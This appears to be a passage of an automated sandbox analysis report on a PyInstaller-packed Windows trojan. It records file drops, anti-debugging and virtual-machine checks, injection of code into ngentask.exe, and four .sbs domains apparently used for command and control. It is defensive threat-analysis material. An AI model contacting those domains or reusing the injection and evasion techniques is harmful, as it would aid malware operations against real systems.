    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_00426F50
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_00437F7A
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: 3_2_0042BF7F
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: String function: 0040CBE0 appears 75 times
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Code function: String function: 0041CB50 appears 172 times
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe Code function: String function: 00F687DB appears 58 times
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe Code function: String function: 00F59710 appears 44 times
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe Code function: String function: 00F52290 appears 194 times
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe Code function: String function: 00F5A140 appears 102 times
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe Code function: String function: 00F52340 appears 86 times
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498477157.00000000006CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_ssl.pyd. vs ceFgl3jkkk.exe
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498335139.00000000006CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_socket.pyd. vs ceFgl3jkkk.exe
    Source: ceFgl3jkkk.exe, 00000000.00000003.1497263952.00000000006CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_decimal.pyd. vs ceFgl3jkkk.exe
    Source: ceFgl3jkkk.exe, 00000000.00000003.1500128542.00000000006CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamepyexpat.pyd. vs ceFgl3jkkk.exe
    Source: ceFgl3jkkk.exe, 00000000.00000003.1497870502.00000000006CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_lzma.pyd. vs ceFgl3jkkk.exe
    Source: ceFgl3jkkk.exe, 00000000.00000003.1499874700.00000000006CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelibsslH vs ceFgl3jkkk.exe
    Source: ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameselect.pyd. vs ceFgl3jkkk.exe
    Source: ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameunicodedata.pyd. vs ceFgl3jkkk.exe
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498125097.00000000006CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_overlapped.pyd. vs ceFgl3jkkk.exe
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498233789.00000000006CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_queue.pyd. vs ceFgl3jkkk.exe
    Source: ceFgl3jkkk.exe, 00000000.00000003.1496897214.00000000006CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_bz2.pyd. vs ceFgl3jkkk.exe
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_uuid.pyd. vs ceFgl3jkkk.exe
    Source: ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameunicodedata.pyd. vs ceFgl3jkkk.exe
    Source: ceFgl3jkkk.exe, 00000000.00000003.1495979955.00000000006CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dllT vs ceFgl3jkkk.exe
    Source: ceFgl3jkkk.exe, 00000000.00000003.1497059480.00000000006CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_ctypes.pyd. vs ceFgl3jkkk.exe
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_multiprocessing.pyd. vs ceFgl3jkkk.exe
    Source: ceFgl3jkkk.exe, 00000000.00000003.1496140740.00000000006CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_asyncio.pyd. vs ceFgl3jkkk.exe
    Source: ceFgl3jkkk.exe, 00000000.00000003.1497503094.00000000006CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_hashlib.pyd. vs ceFgl3jkkk.exe
    Source: ceFgl3jkkk.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
    Source: classification engineClassification label: mal100.troj.evad.winEXE@5/21@11/2
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeCode function: 0_2_00F565B0 GetLastError,FormatMessageW,0_2_00F565B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 3_2_00439BF0 CoCreateInstance,CoCreateInstance,3_2_00439BF0
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI8242Jump to behavior
    Source: ceFgl3jkkk.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: ceFgl3jkkk.exeReversingLabs: Detection: 44%
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeFile read: C:\Users\user\Desktop\ceFgl3jkkk.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\ceFgl3jkkk.exe "C:\Users\user\Desktop\ceFgl3jkkk.exe"
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeProcess created: C:\Users\user\Desktop\ceFgl3jkkk.exe "C:\Users\user\Desktop\ceFgl3jkkk.exe"
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngentask.exe
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeProcess created: C:\Users\user\Desktop\ceFgl3jkkk.exe "C:\Users\user\Desktop\ceFgl3jkkk.exe"Jump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngentask.exeJump to behavior
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Section loaded: apphelp.dll
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Section loaded: kernel.appcore.dll
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Section loaded: version.dll
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Section loaded: vcruntime140.dll
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Section loaded: cryptsp.dll
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Section loaded: rsaenh.dll
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Section loaded: cryptbase.dll
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Section loaded: python3.dll
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Section loaded: libffi-7.dll
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Section loaded: iphlpapi.dll
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Section loaded: libcrypto-1_1.dll
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Section loaded: winhttp.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Section loaded: webio.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Section loaded: mswsock.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Section loaded: winnsi.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Section loaded: sspicli.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Section loaded: dnsapi.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Section loaded: rasadhlp.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Section loaded: fwpuclnt.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Section loaded: schannel.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Section loaded: mskeyprotect.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Section loaded: ntasn1.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Section loaded: ncrypt.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Section loaded: ncryptsslp.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Section loaded: msasn1.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Section loaded: cryptsp.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Section loaded: rsaenh.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Section loaded: cryptbase.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Section loaded: gpapi.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Section loaded: dpapi.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Section loaded: wbemcomn.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Section loaded: amsi.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Section loaded: userenv.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Section loaded: profapi.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Section loaded: version.dll
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | File opened: C:\Users\user\Desktop\pyvenv.cfg
    Source: ceFgl3jkkk.exe | Static file information: File size 7166290 > 1048576
    Source: ceFgl3jkkk.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
    Source: ceFgl3jkkk.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
    Source: ceFgl3jkkk.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
    Source: ceFgl3jkkk.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: ceFgl3jkkk.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
    Source: ceFgl3jkkk.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
    Source: ceFgl3jkkk.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: ceFgl3jkkk.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: D:\a\1\b\bin\win32\_multiprocessing.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _multiprocessing.pyd.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_uuid.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _uuid.pyd.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_decimal.pdb%% source: ceFgl3jkkk.exe, 00000000.00000003.1497263952.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _decimal.pyd.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_lzma.pdbOO source: ceFgl3jkkk.exe, 00000000.00000003.1497870502.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.0.dr
    Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: libssl-1_1.dll.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_ssl.pdb source: _ssl.pyd.0.dr
    Source: Binary string: D:\_w\1\b\libssl-1_1.pdbAA source: libssl-1_1.dll.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_lzma.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1497870502.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_queue.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1498233789.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _queue.pyd.0.dr
    Source: Binary string: d:\a01\_work\2\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: VCRUNTIME140.dll.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_overlapped.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1498125097.00000000006CD000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: D:\a\1\b\bin\win32\pyexpat.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1500128542.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, pyexpat.pyd.0.dr
    Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: libcrypto-1_1.dll.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_bz2.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1496897214.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _bz2.pyd.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\select.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_ctypes.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1497059480.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _ctypes.pyd.0.dr
    Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 1.1.1l 24 Aug 2021built on: Thu Aug 26 18:55:02 2021 UTCplatform: VC-WIN32OPENSSLDIR: "C:\Program Files (x86)\Common Files\SSL"ENGINESDIR: "C:\Program Files (x86)\OpenSSL\lib\engines-1_1"not available source: libcrypto-1_1.dll.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\python39.pdb source: python39.dll.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_asyncio.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1496140740.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _asyncio.pyd.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_decimal.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1497263952.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _decimal.pyd.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_hashlib.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1497503094.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\unicodedata.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, unicodedata.pyd.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_socket.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1498335139.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.0.dr
    Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: libcrypto-1_1.dll.0.dr
    Source: ceFgl3jkkk.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
    Source: ceFgl3jkkk.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
    Source: ceFgl3jkkk.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
    Source: ceFgl3jkkk.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
    Source: ceFgl3jkkk.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
    Source: libcrypto-1_1.dll.0.dr | Static PE information: section name: .00cfg
    Source: libssl-1_1.dll.0.dr | Static PE information: section name: .00cfg
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Code function: 3_2_00449B66 push ds; iretd 3_2_00449B83
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Code function: 3_2_00416BE0 pushad ; mov dword ptr [esp], eax 3_2_00416BEA
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Code function: 3_2_00449C02 push F38BE726h; iretd 3_2_00449C16

    Persistence and Installation Behavior

    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Process created: "C:\Users\user\Desktop\ceFgl3jkkk.exe"
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI8242\_uuid.pyd
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI8242\python39.dll
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI8242\_lzma.pyd
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI8242\_overlapped.pyd
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI8242\VCRUNTIME140.dll
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI8242\libcrypto-1_1.dll
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI8242\_queue.pyd
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI8242\pyexpat.pyd
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI8242\_ctypes.pyd
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI8242\libssl-1_1.dll
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI8242\_bz2.pyd
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI8242\_asyncio.pyd
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI8242\_decimal.pyd
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI8242\_ssl.pyd
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI8242\_multiprocessing.pyd
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI8242\select.pyd
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI8242\unicodedata.pyd
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI8242\_hashlib.pyd
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI8242\libffi-7.dll
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI8242\_socket.pyd
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Code function: 0_2_00F55270 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00F55270
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI8242\_uuid.pyd
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI8242\python39.dll
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI8242\_overlapped.pyd
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI8242\_lzma.pyd
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI8242\_queue.pyd
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI8242\pyexpat.pyd
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI8242\_ctypes.pyd
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI8242\libssl-1_1.dll
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI8242\_bz2.pyd
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI8242\_asyncio.pyd
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI8242\_decimal.pyd
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI8242\_ssl.pyd
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI8242\_multiprocessing.pyd
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI8242\select.pyd
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI8242\unicodedata.pyd
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI8242\_hashlib.pyd
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI8242\_socket.pyd
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | API coverage: 7.2 %
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe TID: 5948 | Thread sleep time: -120000s >= -30000s
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe TID: 6080 | Thread sleep time: -30000s >= -30000s
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Code function: 0_2_00F603E2 FindFirstFileExW,GetLastError,FindNextFileW,GetLastError,0_2_00F603E2
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Code function: 0_2_00F699B3 FindFirstFileExW,0_2_00F699B3
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Code function: 2_2_00F699B3 FindFirstFileExW,2_2_00F699B3
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Code function: 2_2_00F603E2 FindFirstFileExW,GetLastError,FindNextFileW,GetLastError,2_2_00F603E2
    Source: ngentask.exe, 00000003.00000002.1613322725.0000000001347000.00000004.00000020.00020000.00000000.sdmp, ngentask.exe, 00000003.00000002.1613155400.00000000012ED000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
    Source: ceFgl3jkkk.exe, 00000002.00000002.1547337183.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1544241363.0000000000DDC000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1517209000.0000000000DDC000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000002.00000003.1546386874.0000000000DDD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Code function: 3_2_00440600 LdrInitializeThunk,3_2_00440600
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Code function: 0_2_00F63987 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F63987
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Code function: 0_2_00F6A500 mov eax, dword ptr fs:[00000030h] 0_2_00F6A500
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Code function: 0_2_00F627A5 mov eax, dword ptr fs:[00000030h] 0_2_00F627A5
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Code function: 2_2_00F6A500 mov eax, dword ptr fs:[00000030h] 2_2_00F6A500
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Code function: 2_2_00F627A5 mov eax, dword ptr fs:[00000030h] 2_2_00F627A5
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Code function: 0_2_00F6AD03 GetProcessHeap,0_2_00F6AD03
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Code function: 0_2_00F5A075 SetUnhandledExceptionFilter,0_2_00F5A075
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Code function: 0_2_00F63987 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F63987
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Code function: 0_2_00F59986 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00F59986
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Code function: 0_2_00F59EE1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F59EE1
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Code function: 2_2_00F5A075 SetUnhandledExceptionFilter,2_2_00F5A075
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Code function: 2_2_00F63987 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00F63987
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Code function: 2_2_00F59986 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00F59986
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Code function: 2_2_00F59EE1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00F59EE1

    HIPS / PFW / Operating System Protection Evasion

    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000 protect: page execute and read and write
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000 value starts with: 4D5A
    Source: ceFgl3jkkk.exe, 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: drawwyobstacw.sbs
    Source: ceFgl3jkkk.exe, 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: condifendteu.sbs
    Source: ceFgl3jkkk.exe, 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ehticsprocw.sbs
    Source: ceFgl3jkkk.exe, 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: vennurviot.sbs
